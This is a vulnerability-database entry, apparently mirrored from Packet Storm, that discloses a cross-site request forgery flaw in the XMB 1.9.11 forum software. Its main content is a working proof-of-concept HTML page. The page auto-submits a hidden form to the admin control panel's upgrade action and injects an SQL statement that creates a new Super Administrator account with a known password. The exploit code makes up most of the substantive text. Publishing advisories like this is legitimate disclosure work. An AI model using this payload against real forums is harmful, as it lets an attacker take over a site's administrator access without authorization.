Lucene search

XMB 1.9.11 Cross Site Request Forgery

🗓️ 17 Sep 2010 00:00:00Reported by AutoSec ToolsType

packetstorm🔗 packetstormsecurity.com👁 15 Views

XMB 1.9.11 Cross-site Request Forgery allows arbitrary SQL executio

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`<!------------------------------------------------------------------------  
# Software................XMB 1.9.11  
# Vulnerability...........Cross-site Request Forgery  
# Download................http://www.xmbforum.com/  
# Release Date............9/16/2010  
# Tested On...............Windows Vista + XAMPP  
# ------------------------------------------------------------------------  
# Author..................John Leitch  
# Site....................http://www.johnleitch.net/  
# [email protected]  
# ------------------------------------------------------------------------  
#   
# --Description--  
#   
# A cross-site request forgery vulnerability in XMB 1.9.11 can be  
# exploited to execute arbitrary SQL.  
#   
#   
# --PoC-->  
  
<html>  
<body onload="document.forms[0].submit()">  
<form method="POST" action="http://localhost/xmb/cp.php?action=upgrade">  
<input type="hidden" name="upgrade" value="INSERT INTO xmb_members (username, password, status) VALUES ('new_admin', md5('Password1'), 'Super Administrator')" />  
<input type="hidden" name="upgradesubmit" value="Submit Changes" />  
</form>  
</body>  
</html>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

17 Sep 2010 00:00Current

0.7Low risk

Vulners AI Score0.7